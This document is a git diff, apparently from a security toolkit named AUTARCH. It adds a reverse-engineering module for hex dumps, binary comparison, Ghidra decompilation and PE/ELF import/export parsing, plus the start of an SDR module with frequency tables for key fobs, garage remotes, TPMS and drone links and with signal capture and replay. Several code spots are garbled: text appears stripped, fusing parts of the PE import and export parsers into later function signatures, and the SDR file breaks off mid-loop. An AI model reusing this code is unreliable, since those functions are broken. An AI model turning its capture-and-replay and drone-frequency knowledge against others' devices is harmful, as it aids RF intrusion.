── Hex Dump ───────────────────────────────────────────────────────── + + def hex_dump(self, file_path: str, offset: int = 0, length: int = 256) -> Dict[str, Any]: + """Generate formatted hex dump of a file region.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found'} + + try: + file_size = p.stat().st_size + with open(p, 'rb') as f: + f.seek(offset) + data = f.read(length) + except Exception as e: + return {'error': str(e)} + + lines = [] + for i in range(0, len(data), 16): + chunk = data[i:i + 16] + hex_part = ' '.join(f'{b:02x}' for b in chunk) + # Add spacing between 8-byte groups + if len(chunk) > 8: + hex_bytes = [f'{b:02x}' for b in chunk] + hex_part = ' '.join(hex_bytes[:8]) + ' ' + ' '.join(hex_bytes[8:]) + ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk) + lines.append({ + 'offset': f'{offset + i:08x}', + 'hex': hex_part, + 'ascii': ascii_part, + }) + + # Also produce a formatted text version + text_lines = [] + for line in lines: + text_lines.append(f'{line["offset"]} {line["hex"]:<49} |{line["ascii"]}|') + + return { + 'offset': offset, + 'length': len(data), + 'file_size': file_size, + 'lines': lines, + 'text': '\n'.join(text_lines), + } + + def hex_search(self, file_path: str, pattern: str) -> Dict[str, Any]: + """Search for a hex pattern in a binary file. Pattern: space/dash separated hex bytes.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found', 'matches': []} + + # Parse hex pattern + clean = re.sub(r'[^0-9a-fA-F?]', '', pattern.replace('??', 'FF')) + if len(clean) % 2 != 0: + return {'error': 'Invalid hex pattern (odd number of nibbles)', 'matches': []} + + try: + search_bytes = bytes.fromhex(re.sub(r'[^0-9a-fA-F]', '', pattern.replace(' ', '').replace('-', ''))) + except ValueError: + return {'error': 'Invalid hex pattern', 'matches': []} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': str(e), 'matches': []} + + matches = [] + start = 0 + while True: + idx = data.find(search_bytes, start) + if idx == -1: + break + context = data[max(0, idx - 8):idx + len(search_bytes) + 8] + matches.append({ + 'offset': idx, + 'offset_hex': f'0x{idx:08x}', + 'context': context.hex(), + }) + start = idx + 1 + if len(matches) >= 1000: + break + + return { + 'pattern': search_bytes.hex(), + 'matches': matches, + 'total': len(matches), + 'file_size': len(data), + } + + # ── Binary Comparison ──────────────────────────────────────────────── + + def compare_binaries(self, file1: str, file2: str) -> Dict[str, Any]: + """Compare two binary files: sizes, hashes, section diffs, byte-level changes.""" + p1, p2 = Path(file1), Path(file2) + if not p1.exists(): + return {'error': f'File not found: {file1}'} + if not p2.exists(): + return {'error': f'File not found: {file2}'} + + try: + with open(p1, 'rb') as f: + data1 = f.read() + with open(p2, 'rb') as f: + data2 = f.read() + except Exception as e: + return {'error': str(e)} + + # Size comparison + size1, size2 = len(data1), len(data2) + + # Hashes + hashes1 = { + 'md5': hashlib.md5(data1).hexdigest(), + 'sha256': hashlib.sha256(data1).hexdigest(), + } + hashes2 = { + 'md5': hashlib.md5(data2).hexdigest(), + 'sha256': hashlib.sha256(data2).hexdigest(), + } + + identical = hashes1['sha256'] == hashes2['sha256'] + + # Byte-level diff summary + min_len = min(len(data1), len(data2)) + diff_count = 0 + diff_regions = [] + in_diff = False + diff_start = 0 + + for i in range(min_len): + if data1[i] != data2[i]: + diff_count += 1 + if not in_diff: + in_diff = True + diff_start = i + else: + if in_diff: + in_diff = False + diff_regions.append({ + 'offset': f'0x{diff_start:08x}', + 'length': i - diff_start, + }) + if in_diff: + diff_regions.append({ + 'offset': f'0x{diff_start:08x}', + 'length': min_len - diff_start, + }) + + # Add difference for size mismatch + if size1 != size2: + diff_count += abs(size1 - size2) + + # Section-level comparison for PE/ELF + section_diffs = [] + ft1 = self.get_file_type(file1) + ft2 = self.get_file_type(file2) + if ft1.get('type') == ft2.get('type') and ft1.get('type') in ('PE', 'ELF'): + if ft1['type'] == 'PE': + pe1, pe2 = self.parse_pe(file1), self.parse_pe(file2) + secs1 = {s['name']: s for s in pe1.get('sections', [])} + secs2 = {s['name']: s for s in pe2.get('sections', [])} + else: + elf1, elf2 = self.parse_elf(file1), self.parse_elf(file2) + secs1 = {s['name']: s for s in elf1.get('sections', [])} + secs2 = {s['name']: s for s in elf2.get('sections', [])} + + all_names = sorted(set(list(secs1.keys()) + list(secs2.keys()))) + for name in all_names: + s1 = secs1.get(name) + s2 = secs2.get(name) + if s1 and s2: + size_key = 'raw_size' if ft1['type'] == 'PE' else 'size' + section_diffs.append({ + 'name': name, + 'status': 'modified' if s1.get(size_key) != s2.get(size_key) else 'unchanged', + 'size_file1': s1.get(size_key, 0), + 'size_file2': s2.get(size_key, 0), + }) + elif s1: + section_diffs.append({'name': name, 'status': 'removed'}) + else: + section_diffs.append({'name': name, 'status': 'added'}) + + # Entropy comparison + ent1 = self.calculate_entropy(data1) + ent2 = self.calculate_entropy(data2) + + return { + 'file1': {'name': p1.name, 'size': size1, 'hashes': hashes1, 'entropy': ent1}, + 'file2': {'name': p2.name, 'size': size2, 'hashes': hashes2, 'entropy': ent2}, + 'identical': identical, + 'diff_bytes': diff_count, + 'diff_percentage': round((diff_count / max(max(size1, size2), 1)) * 100, 2), + 'diff_regions': diff_regions[:100], + 'diff_regions_total': len(diff_regions), + 'section_diffs': section_diffs, + } + + # ── Ghidra Integration ─────────────────────────────────────────────── + + def ghidra_decompile(self, file_path: str, function: Optional[str] = None) -> Dict[str, Any]: + """Run Ghidra headless analysis and return decompiled output.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found'} + + analyze_headless = find_tool('analyzeHeadless') + if not analyze_headless: + # Try common Ghidra install locations + ghidra_paths = [] + if os.name == 'nt': + for drive in ['C', 'D']: + ghidra_paths.extend([ + Path(f'{drive}:/ghidra/support/analyzeHeadless.bat'), + Path(f'{drive}:/Program Files/ghidra/support/analyzeHeadless.bat'), + ]) + else: + ghidra_paths.extend([ + Path('/opt/ghidra/support/analyzeHeadless'), + Path('/usr/local/ghidra/support/analyzeHeadless'), + Path.home() / 'ghidra' / 'support' / 'analyzeHeadless', + ]) + + for gp in ghidra_paths: + if gp.exists(): + analyze_headless = str(gp) + break + + if not analyze_headless: + return {'error': 'Ghidra not found. Install Ghidra and ensure analyzeHeadless is in PATH.'} + + # Create temporary project directory + with tempfile.TemporaryDirectory(prefix='autarch_ghidra_') as tmp_dir: + project_name = 'autarch_analysis' + + cmd = [ + analyze_headless, + tmp_dir, project_name, + '-import', str(p), + '-postScript', 'DecompileHeadless.java', + '-scriptlog', os.path.join(tmp_dir, 'script.log'), + '-deleteProject', + ] + + if function: + cmd.extend(['-scriptArgs', function]) + + try: + result = subprocess.run( + cmd, capture_output=True, text=True, timeout=300, + cwd=tmp_dir) + + output = result.stdout + '\n' + result.stderr + + # Try to read script output + log_path = os.path.join(tmp_dir, 'script.log') + script_output = '' + if os.path.exists(log_path): + with open(log_path, 'r') as f: + script_output = f.read() + + return { + 'output': output, + 'script_output': script_output, + 'return_code': result.returncode, + 'function': function, + } + except subprocess.TimeoutExpired: + return {'error': 'Ghidra analysis timed out (300s limit)'} + except Exception as e: + return {'error': f'Ghidra execution failed: {e}'} + + # ── Import / Export Extraction ─────────────────────────────────────── + + def get_imports(self, file_path: str) -> List[Dict[str, Any]]: + """Extract imported functions from PE or ELF binary.""" + ft = self.get_file_type(file_path) + ftype = ft.get('type', '') + + if ftype == 'PE': + return self._get_pe_imports(file_path) + elif ftype == 'ELF': + return self._get_elf_imports(file_path) + return [] + + def _get_pe_imports(self, file_path: str) -> List[Dict[str, Any]]: + """Parse PE import directory table.""" + pe = self.parse_pe(file_path) + if 'error' in pe: + return [] + + try: + with open(file_path, 'rb') as f: + data = f.read() + except Exception: + return [] + + # Find import directory RVA + import_dir = None + for dd in pe.get('data_directories', []): + if dd['name'] == 'Import': + import_dir = dd + break + + if not import_dir: + return [] + + import_rva = int(import_dir['rva'], 16) + if import_rva == 0: + return [] + + # Convert RVA to file offset using section mapping + sections = pe.get('sections', []) + + def rva_to_offset(rva): + for sec in sections: + sec_va = int(sec['virtual_address'], 16) + sec_raw = sec['raw_offset'] + sec_vs = sec['virtual_size'] + if sec_va <= rva < sec_va + sec_vs: + return sec_raw + (rva - sec_va) + return rva + + imports = [] + offset = rva_to_offset(import_rva) + + # Read Import Directory entries (20 bytes each) + while offset + 20 <= len(data): + ilt_rva, timestamp, forwarder, name_rva, iat_rva = struct.unpack_from(' List[Dict[str, Any]]: + """Extract imported symbols from ELF dynamic symbol table.""" + elf = self.parse_elf(file_path) + if 'error' in elf: + return [] + + try: + with open(file_path, 'rb') as f: + data = f.read() + except Exception: + return [] + + is_64 = '64-bit' in elf.get('class', '') + endian = '<' if 'Little' in elf.get('endianness', 'Little') else '>' + + # Find .dynsym and .dynstr sections + dynsym_sec = None + dynstr_sec = None + for sec in elf.get('sections', []): + if sec['name'] == '.dynsym': + dynsym_sec = sec + elif sec['name'] == '.dynstr': + dynstr_sec = sec + + if not dynsym_sec or not dynstr_sec: + return [] + + # Read string table + str_off = dynstr_sec['offset'] + str_size = dynstr_sec['size'] + if str_off + str_size > len(data): + return [] + strtab = data[str_off:str_off + str_size] + + # Read symbol table + sym_off = dynsym_sec['offset'] + sym_size = dynsym_sec['size'] + entry_size = 24 if is_64 else 16 + + imports = [] + for i in range(0, sym_size, entry_size): + off = sym_off + i + if is_64 and off + 24 <= len(data): + st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from( + f'{endian}IBBHQQ', data, off) + elif not is_64 and off + 16 <= len(data): + st_name, st_value, st_size, st_info, st_other, st_shndx = struct.unpack_from( + f'{endian}IIIBBH', data, off) + else: + break + + # Undefined symbols (imports) have shndx == 0 + if st_shndx == 0 and st_name > 0 and st_name < len(strtab): + end = strtab.find(b'\x00', st_name) + if end != -1: + sym_name = strtab[st_name:end].decode('ascii', errors='replace') + if sym_name: + bind = (st_info >> 4) & 0xf + sym_type = st_info & 0xf + bind_str = {0: 'LOCAL', 1: 'GLOBAL', 2: 'WEAK'}.get(bind, str(bind)) + type_str = {0: 'NOTYPE', 1: 'OBJECT', 2: 'FUNC'}.get(sym_type, str(sym_type)) + imports.append({ + 'name': sym_name, + 'bind': bind_str, + 'type': type_str, + }) + + # Group by library if possible (from NEEDED entries in dynamic section) + needed_libs = [] + for dyn in elf.get('dynamic', []): + if dyn['tag'] == 1: # DT_NEEDED + val = int(dyn['value'], 16) + if val < len(strtab): + end = strtab.find(b'\x00', val) + if end != -1: + needed_libs.append(strtab[val:end].decode('ascii', errors='replace')) + + result = [{'library': lib, 'functions': [], 'count': 0} for lib in needed_libs] + if imports: + ungrouped = {'library': '(dynamic imports)', 'functions': imports, 'count': len(imports)} + result.append(ungrouped) + + return result + + def get_exports(self, file_path: str) -> List[Dict[str, Any]]: + """Extract exported functions from PE or ELF binary.""" + ft = self.get_file_type(file_path) + ftype = ft.get('type', '') + + if ftype == 'PE': + return self._get_pe_exports(file_path) + elif ftype == 'ELF': + return self._get_elf_exports(file_path) + return [] + + def _get_pe_exports(self, file_path: str) -> List[Dict[str, Any]]: + """Parse PE export directory table.""" + pe = self.parse_pe(file_path) + if 'error' in pe: + return [] + + try: + with open(file_path, 'rb') as f: + data = f.read() + except Exception: + return [] + + export_dir = None + for dd in pe.get('data_directories', []): + if dd['name'] == 'Export': + export_dir = dd + break + + if not export_dir: + return [] + + export_rva = int(export_dir['rva'], 16) + if export_rva == 0: + return [] + + sections = pe.get('sections', []) + + def rva_to_offset(rva): + for sec in sections: + sec_va = int(sec['virtual_address'], 16) + sec_raw = sec['raw_offset'] + sec_vs = sec['virtual_size'] + if sec_va <= rva < sec_va + sec_vs: + return sec_raw + (rva - sec_va) + return rva + + offset = rva_to_offset(export_rva) + if offset + 40 > len(data): + return [] + + _, timestamp, major_ver, minor_ver, name_rva, ordinal_base, \ + num_functions, num_names, addr_functions_rva, addr_names_rva, \ + addr_ordinals_rva = struct.unpack_from(' len(data): + break + name_rva = struct.unpack_from('' + else: + func_name = f'' + + ordinal = 0 + if ordinals_offset + (i + 1) * 2 <= len(data): + ordinal = struct.unpack_from(' List[Dict[str, Any]]: + """Extract exported (defined GLOBAL/WEAK) symbols from ELF.""" + elf = self.parse_elf(file_path) + if 'error' in elf: + return [] + + try: + with open(file_path, 'rb') as f: + data = f.read() + except Exception: + return [] + + is_64 = '64-bit' in elf.get('class', '') + endian = '<' if 'Little' in elf.get('endianness', 'Little') else '>' + + # Find .dynsym and .dynstr + dynsym_sec = None + dynstr_sec = None + for sec in elf.get('sections', []): + if sec['name'] == '.dynsym': + dynsym_sec = sec + elif sec['name'] == '.dynstr': + dynstr_sec = sec + + if not dynsym_sec or not dynstr_sec: + return [] + + str_off = dynstr_sec['offset'] + str_size = dynstr_sec['size'] + if str_off + str_size > len(data): + return [] + strtab = data[str_off:str_off + str_size] + + sym_off = dynsym_sec['offset'] + sym_size = dynsym_sec['size'] + entry_size = 24 if is_64 else 16 + + exports = [] + for i in range(0, sym_size, entry_size): + off = sym_off + i + if is_64 and off + 24 <= len(data): + st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from( + f'{endian}IBBHQQ', data, off) + elif not is_64 and off + 16 <= len(data): + st_name, st_value, st_size, st_info, st_other, st_shndx = struct.unpack_from( + f'{endian}IIIBBH', data, off) + else: + break + + # Exported = defined (shndx != 0) and GLOBAL or WEAK binding + bind = (st_info >> 4) & 0xf + if st_shndx != 0 and bind in (1, 2) and st_name > 0 and st_name < len(strtab): + end = strtab.find(b'\x00', st_name) + if end != -1: + sym_name = strtab[st_name:end].decode('ascii', errors='replace') + if sym_name: + sym_type = st_info & 0xf + type_str = {0: 'NOTYPE', 1: 'OBJECT', 2: 'FUNC'}.get(sym_type, str(sym_type)) + exports.append({ + 'name': sym_name, + 'address': f'0x{st_value:x}', + 'type': type_str, + 'size': st_size, + }) + + return exports + + # ── Utility Methods ────────────────────────────────────────────────── + + @staticmethod + def _human_size(size: int) -> str: + """Convert bytes to human-readable string.""" + for unit in ['B', 'KB', 'MB', 'GB', 'TB']: + if size < 1024: + return f'{size:.1f} {unit}' if unit != 'B' else f'{size} {unit}' + size /= 1024 + return f'{size:.1f} PB' + + def print_status(self, message: str, status: str = "info"): + colors = {"info": Colors.CYAN, "success": Colors.GREEN, + "warning": Colors.YELLOW, "error": Colors.RED} + symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"} + print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}") + + # ── CLI Interface ──────────────────────────────────────────────────── + + def show_menu(self): + clear_screen() + display_banner() + print(f"{Colors.CYAN}{Colors.BOLD} Reverse Engineering Toolkit{Colors.RESET}") + print(f"{Colors.DIM} Binary analysis, disassembly & YARA scanning{Colors.RESET}") + print(f"{Colors.DIM} {'=' * 50}{Colors.RESET}") + print() + print(f" {Colors.CYAN}[1]{Colors.RESET} Analyze Binary") + print(f" {Colors.CYAN}[2]{Colors.RESET} Disassemble") + print(f" {Colors.CYAN}[3]{Colors.RESET} YARA Scan") + print(f" {Colors.CYAN}[4]{Colors.RESET} Hex Dump") + print(f" {Colors.CYAN}[5]{Colors.RESET} Detect Packer") + print(f" {Colors.CYAN}[6]{Colors.RESET} Compare Binaries") + print() + print(f" {Colors.DIM}[0]{Colors.RESET} Back") + print() + + def cli_analyze(self): + filepath = input(f"{Colors.WHITE} Enter file path: {Colors.RESET}").strip() + if not filepath: + return + result = self.analyze_binary(filepath) + if 'error' in result: + self.print_status(result['error'], 'error') + return + print(f"\n{Colors.CYAN}{'=' * 60}{Colors.RESET}") + print(f" {Colors.BOLD}{result['name']}{Colors.RESET}") + print(f" Type: {result['file_type'].get('type', 'unknown')} | " + f"Arch: {result['architecture']} | Size: {result['size_human']}") + print(f"\n {Colors.CYAN}Hashes:{Colors.RESET}") + for algo, val in result['hashes'].items(): + print(f" {algo.upper():8} {val}") + print(f"\n {Colors.CYAN}Entropy:{Colors.RESET} {result['entropy']} ({result['entropy_level']})") + if result['section_entropy']: + for s in result['section_entropy']: + bar = '#' * int(s['entropy'] * 3) + color = Colors.RED if s['entropy'] > 7.0 else (Colors.YELLOW if s['entropy'] > 6.0 else Colors.GREEN) + print(f" {s['name']:12} {color}{s['entropy']:.2f}{Colors.RESET} {bar}") + print(f"\n {Colors.CYAN}Strings:{Colors.RESET} {result['strings_count']} found") + if result['packer']['detected']: + print(f"\n {Colors.RED}Packer Detected:{Colors.RESET}") + for d in result['packer']['detections']: + print(f" {d['packer']} (confidence: {d['confidence']}%)") + + def cli_disassemble(self): + filepath = input(f"{Colors.WHITE} Enter file path: {Colors.RESET}").strip() + if not filepath: + return + section = input(f"{Colors.WHITE} Section [.text]: {Colors.RESET}").strip() or '.text' + count = input(f"{Colors.WHITE} Instruction count [50]: {Colors.RESET}").strip() or '50' + try: + count = int(count) + except ValueError: + count = 50 + + results = self.disassemble_file(filepath, section=section, count=count) + if results and 'error' in results[0]: + self.print_status(results[0]['error'], 'error') + return + print(f"\n{Colors.CYAN}{'Address':<14} {'Bytes':<24} {'Mnemonic':<10} {'Operands'}{Colors.RESET}") + print(f"{'-' * 70}") + for inst in results: + print(f" {inst['address']:<12} {inst.get('bytes_hex', ''):<22} " + f"{Colors.CYAN}{inst['mnemonic']:<10}{Colors.RESET} {inst.get('op_str', '')}") + + def cli_yara_scan(self): + filepath = input(f"{Colors.WHITE} Enter file path to scan: {Colors.RESET}").strip() + if not filepath: + return + rules_path = input(f"{Colors.WHITE} YARA rules file (or Enter for all): {Colors.RESET}").strip() or None + result = self.yara_scan(filepath, rules_path=rules_path) + if 'error' in result and result['error']: + self.print_status(result['error'], 'error') + if result.get('matches'): + print(f"\n {Colors.RED}Matches: {result['total']}{Colors.RESET}") + for m in result['matches']: + print(f" Rule: {m['rule']}") + for s in m.get('strings', [])[:5]: + print(f" 0x{s.get('offset', 0):08x}: {s.get('identifier', '')} = {s.get('data', '')}") + else: + self.print_status("No matches found", "info") + + def cli_hex_dump(self): + filepath = input(f"{Colors.WHITE} Enter file path: {Colors.RESET}").strip() + if not filepath: + return + offset = input(f"{Colors.WHITE} Offset [0]: {Colors.RESET}").strip() or '0' + length = input(f"{Colors.WHITE} Length [256]: {Colors.RESET}").strip() or '256' + try: + offset = int(offset, 0) + length = int(length, 0) + except ValueError: + self.print_status("Invalid offset or length", "error") + return + result = self.hex_dump(filepath, offset, length) + if 'error' in result: + self.print_status(result['error'], 'error') + return + print(f"\n{Colors.CYAN}{result['text']}{Colors.RESET}") + + def cli_detect_packer(self): + filepath = input(f"{Colors.WHITE} Enter file path: {Colors.RESET}").strip() + if not filepath: + return + result = self.detect_packer(filepath) + if 'error' in result: + self.print_status(result['error'], 'error') + return + if result['detected']: + print(f"\n {Colors.RED}Packer(s) Detected:{Colors.RESET}") + for d in result['detections']: + print(f" {d['packer']} — confidence {d['confidence']}%") + print(f" {d['description']}") + for e in d.get('evidence', []): + print(f" {e}") + else: + self.print_status("No packer detected", "success") + print(f" Entropy: {result.get('overall_entropy', 0):.4f}") + + def cli_compare(self): + file1 = input(f"{Colors.WHITE} First file: {Colors.RESET}").strip() + file2 = input(f"{Colors.WHITE} Second file: {Colors.RESET}").strip() + if not file1 or not file2: + return + result = self.compare_binaries(file1, file2) + if 'error' in result: + self.print_status(result['error'], 'error') + return + f1, f2 = result['file1'], result['file2'] + print(f"\n{Colors.CYAN}{'=' * 60}{Colors.RESET}") + print(f" File 1: {f1['name']} ({f1['size']:,} bytes, entropy {f1['entropy']:.2f})") + print(f" File 2: {f2['name']} ({f2['size']:,} bytes, entropy {f2['entropy']:.2f})") + if result['identical']: + self.print_status("Files are identical", "success") + else: + print(f"\n {Colors.YELLOW}Different bytes: {result['diff_bytes']:,} ({result['diff_percentage']}%){Colors.RESET}") + print(f" Diff regions: {result['diff_regions_total']}") + for sd in result.get('section_diffs', []): + status_color = Colors.RED if sd['status'] != 'unchanged' else Colors.GREEN + print(f" {sd['name']:16} {status_color}{sd['status']}{Colors.RESET}") + + def run(self): + while True: + self.show_menu() + try: + choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip() + if choice == "0": + break + elif choice == "1": + self.cli_analyze() + elif choice == "2": + self.cli_disassemble() + elif choice == "3": + self.cli_yara_scan() + elif choice == "4": + self.cli_hex_dump() + elif choice == "5": + self.cli_detect_packer() + elif choice == "6": + self.cli_compare() + + if choice in ["1", "2", "3", "4", "5", "6"]: + input(f"\n{Colors.WHITE} Press Enter to continue...{Colors.RESET}") + + except (EOFError, KeyboardInterrupt): + break + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_reverse_eng() -> ReverseEngineer: + global _instance + if _instance is None: + _instance = ReverseEngineer() + return _instance + + +def run(): + get_reverse_eng().run() + + +if __name__ == "__main__": + run() diff --git a/modules/sdr_tools.py b/modules/sdr_tools.py new file mode 100644 index 0000000..3b3201c --- /dev/null +++ b/modules/sdr_tools.py @@ -0,0 +1,2091 @@ +"""AUTARCH SDR / RF Tools + +Software-defined radio integration for spectrum analysis, signal capture/replay, +ADS-B tracking, FM/AM demodulation, and GPS spoofing detection. +Supports HackRF, RTL-SDR, and compatible devices. +""" + +DESCRIPTION = "SDR/RF — spectrum analysis, signal capture & replay" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import shutil +import struct +import subprocess +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Common Frequencies Reference ───────────────────────────────────────────── + +COMMON_FREQUENCIES = { + 'FM Broadcast': { + 'range': '87.5-108 MHz', + 'entries': [ + {'freq': 87500000, 'name': 'FM Band Start'}, + {'freq': 92100000, 'name': 'FM Example (92.1)'}, + {'freq': 97500000, 'name': 'FM Example (97.5)'}, + {'freq': 108000000, 'name': 'FM Band End'}, + ], + }, + 'Aviation': { + 'range': '108-137 MHz', + 'entries': [ + {'freq': 108000000, 'name': 'VOR/ILS Start'}, + {'freq': 118000000, 'name': 'Air Traffic Control Start'}, + {'freq': 121500000, 'name': 'Emergency / Guard'}, + {'freq': 123450000, 'name': 'Air-to-Air (Unicom)'}, + {'freq': 128825000, 'name': 'Eurocontrol UAC'}, + {'freq': 132000000, 'name': 'Approach Control'}, + {'freq': 136975000, 'name': 'ACARS'}, + ], + }, + 'Marine VHF': { + 'range': '156-162 MHz', + 'entries': [ + {'freq': 156000000, 'name': 'Ch 0 — Coast Guard'}, + {'freq': 156300000, 'name': 'Ch 6 — Intership Safety'}, + {'freq': 156525000, 'name': 'Ch 70 — DSC Distress'}, + {'freq': 156800000, 'name': 'Ch 16 — Distress / Calling'}, + {'freq': 161975000, 'name': 'AIS 1'}, + {'freq': 162025000, 'name': 'AIS 2'}, + ], + }, + 'Weather': { + 'range': '162.4-162.55 MHz', + 'entries': [ + {'freq': 162400000, 'name': 'NOAA WX1'}, + {'freq': 162425000, 'name': 'NOAA WX2'}, + {'freq': 162450000, 'name': 'NOAA WX3'}, + {'freq': 162475000, 'name': 'NOAA WX4'}, + {'freq': 162500000, 'name': 'NOAA WX5'}, + {'freq': 162525000, 'name': 'NOAA WX6'}, + {'freq': 162550000, 'name': 'NOAA WX7'}, + ], + }, + 'ISM 433': { + 'range': '433-434 MHz', + 'notes': 'Garage doors, key fobs, weather stations, tire pressure sensors', + 'entries': [ + {'freq': 433050000, 'name': 'ISM 433.05 — Key Fobs'}, + {'freq': 433420000, 'name': 'ISM 433.42 — TPMS'}, + {'freq': 433920000, 'name': 'ISM 433.92 — Common Remote'}, + {'freq': 434000000, 'name': 'ISM Band End'}, + ], + }, + 'ISM 915': { + 'range': '902-928 MHz', + 'notes': 'LoRa, smart meters, Z-Wave, RFID', + 'entries': [ + {'freq': 902000000, 'name': 'ISM 902 Band Start'}, + {'freq': 903900000, 'name': 'LoRa Uplink Start'}, + {'freq': 915000000, 'name': 'ISM Center'}, + {'freq': 923300000, 'name': 'LoRa Downlink Start'}, + {'freq': 928000000, 'name': 'ISM 928 Band End'}, + ], + }, + 'Pager': { + 'range': '929-932 MHz', + 'entries': [ + {'freq': 929000000, 'name': 'Pager Band Start'}, + {'freq': 931000000, 'name': 'Common Pager Freq'}, + {'freq': 931862500, 'name': 'FLEX Pager'}, + ], + }, + 'ADS-B': { + 'range': '1090 MHz', + 'entries': [ + {'freq': 978000000, 'name': 'UAT (978 MHz) — GA'}, + {'freq': 1090000000, 'name': 'Mode S Extended Squitter'}, + ], + }, + 'GPS L1': { + 'range': '1575.42 MHz', + 'entries': [ + {'freq': 1575420000, 'name': 'GPS L1 C/A'}, + {'freq': 1176450000, 'name': 'GPS L5'}, + {'freq': 1227600000, 'name': 'GPS L2'}, + {'freq': 1602000000, 'name': 'GLONASS L1'}, + ], + }, + 'WiFi 2.4': { + 'range': '2.4-2.5 GHz', + 'entries': [ + {'freq': 2412000000, 'name': 'Channel 1'}, + {'freq': 2437000000, 'name': 'Channel 6'}, + {'freq': 2462000000, 'name': 'Channel 11'}, + ], + }, + 'Public Safety': { + 'range': '150-174 / 450-470 MHz', + 'entries': [ + {'freq': 155475000, 'name': 'Police Mutual Aid'}, + {'freq': 155520000, 'name': 'Fire Mutual Aid'}, + {'freq': 156750000, 'name': 'Search & Rescue'}, + {'freq': 460025000, 'name': 'Police UHF Common'}, + {'freq': 462562500, 'name': 'FRS Channel 1'}, + {'freq': 462675000, 'name': 'GMRS Repeater'}, + ], + }, + 'Amateur': { + 'range': 'Various bands', + 'entries': [ + {'freq': 144000000, 'name': '2m Band Start'}, + {'freq': 146520000, 'name': '2m Calling Freq'}, + {'freq': 146940000, 'name': '2m Repeater'}, + {'freq': 440000000, 'name': '70cm Band Start'}, + {'freq': 446000000, 'name': '70cm Calling Freq'}, + ], + }, +} + + +# ── Drone RF Frequency Reference ───────────────────────────────────────────── + +DRONE_FREQUENCIES = { + 'dji_control_2g': {'center': 2437000000, 'bandwidth': 40000000, 'desc': 'DJI OcuSync 2.4 GHz Control'}, + 'dji_control_5g': {'center': 5787000000, 'bandwidth': 80000000, 'desc': 'DJI OcuSync 5.8 GHz Control'}, + 'fpv_video_5g': {'center': 5800000000, 'bandwidth': 200000000, 'desc': 'Analog FPV 5.8 GHz Video'}, + 'crossfire_900': {'center': 915000000, 'bandwidth': 26000000, 'desc': 'TBS Crossfire 900 MHz'}, + 'elrs_2g': {'center': 2440000000, 'bandwidth': 80000000, 'desc': 'ExpressLRS 2.4 GHz'}, + 'elrs_900': {'center': 915000000, 'bandwidth': 26000000, 'desc': 'ExpressLRS 900 MHz'}, + 'analog_video_12g': {'center': 1280000000, 'bandwidth': 100000000, 'desc': '1.2 GHz Analog Video'}, + 'telemetry_433': {'center': 433000000, 'bandwidth': 2000000, 'desc': '433 MHz Telemetry'}, +} + +FPV_5G_CHANNELS = { + 'R1': 5658, 'R2': 5695, 'R3': 5732, 'R4': 5769, 'R5': 5806, 'R6': 5843, 'R7': 5880, 'R8': 5917, + 'F1': 5740, 'F2': 5760, 'F3': 5780, 'F4': 5800, 'F5': 5820, 'F6': 5840, 'F7': 5860, 'F8': 5880, + 'E1': 5705, 'E2': 5685, 'E3': 5665, 'E4': 5645, 'E5': 5885, 'E6': 5905, 'E7': 5925, 'E8': 5945, + 'A1': 5865, 'A2': 5845, 'A3': 5825, 'A4': 5805, 'A5': 5785, 'A6': 5765, 'A7': 5745, 'A8': 5725, +} + + +# ── SDR Tools Class ────────────────────────────────────────────────────────── + +class SDRTools: + """Software-defined radio integration for the AUTARCH platform.""" + + _instance = None + + def __init__(self): + self._sdr_dir = Path(str(get_data_dir())) / 'sdr' + self._sdr_dir.mkdir(parents=True, exist_ok=True) + self._recordings_dir = self._sdr_dir / 'recordings' + self._recordings_dir.mkdir(parents=True, exist_ok=True) + self._metadata_file = self._sdr_dir / 'recordings_meta.json' + self._capture_process: Optional[subprocess.Popen] = None + self._capture_lock = threading.Lock() + self._capture_info: Dict[str, Any] = {} + self._adsb_process: Optional[subprocess.Popen] = None + self._adsb_thread: Optional[threading.Thread] = None + self._adsb_running = False + self._adsb_aircraft: Dict[str, Dict[str, Any]] = {} + self._adsb_lock = threading.Lock() + # Drone detection state + self._drone_process: Optional[subprocess.Popen] = None + self._drone_thread: Optional[threading.Thread] = None + self._drone_running = False + self._drone_detections: List[Dict[str, Any]] = [] + self._drone_lock = threading.Lock() + self._drone_detections_file = self._sdr_dir / 'drone_detections.json' + self._load_drone_detections() + self._load_metadata() + + def _load_metadata(self): + """Load recording metadata from disk.""" + try: + if self._metadata_file.exists(): + with open(self._metadata_file, 'r') as f: + self._metadata = json.load(f) + else: + self._metadata = [] + except Exception: + self._metadata = [] + + def _save_metadata(self): + """Persist recording metadata to disk.""" + try: + with open(self._metadata_file, 'w') as f: + json.dump(self._metadata, f, indent=2) + except Exception: + pass + + def _run_cmd(self, cmd: str, timeout: int = 30) -> tuple: + """Run a shell command and return (success, stdout).""" + try: + result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + # ── Device Detection ───────────────────────────────────────────────────── + + def detect_devices(self) -> List[Dict[str, Any]]: + """Detect connected SDR devices (RTL-SDR, HackRF).""" + devices = [] + + # Check RTL-SDR + rtl_test = find_tool('rtl_test') + if rtl_test: + try: + result = subprocess.run( + [rtl_test, '-t'], + capture_output=True, text=True, timeout=8 + ) + output = result.stdout + result.stderr + # Look for "Found N device(s)" pattern + match = re.search(r'Found\s+(\d+)\s+device', output) + if match: + count = int(match.group(1)) + if count > 0: + # Parse each device + for m in 